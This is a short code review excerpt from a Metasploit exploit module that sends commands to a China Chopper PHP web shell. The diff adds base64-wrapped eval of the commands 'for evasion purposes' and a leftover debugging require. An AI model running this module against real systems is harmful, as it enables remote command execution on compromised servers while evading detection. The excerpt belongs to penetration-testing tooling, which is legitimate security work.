base64 for evasion purposes

Author: nixawk

modules/exploits/multi/http/caidao_php_backdoor_exec.rb

@@ -5,6 +5,7 @@
 ##
 
 require 'msf/core'
+require 'pry'
 
 class Metasploit4 < Msf::Exploit::Remote
   Rank = ExcellentRanking
@@ -26,7 +27,7 @@ def initialize(info = {})
         ],
       'Payload'           =>
         {
-          'BadChars'      => '\x00',
+          'BadChars'      => '\x00'
         },
       'Platform'          => ['php'],
       'Arch'              => ARCH_PHP,
@@ -46,6 +47,7 @@ def initialize(info = {})
   end
 
   def http_send_command(code)
+    code = "eval(base64_decode(\"#{Rex::Text.encode_base64(code)}\"));"
     res = send_request_cgi({
       'method'    => 'POST',
       'uri'       => normalize_uri(target_uri.path),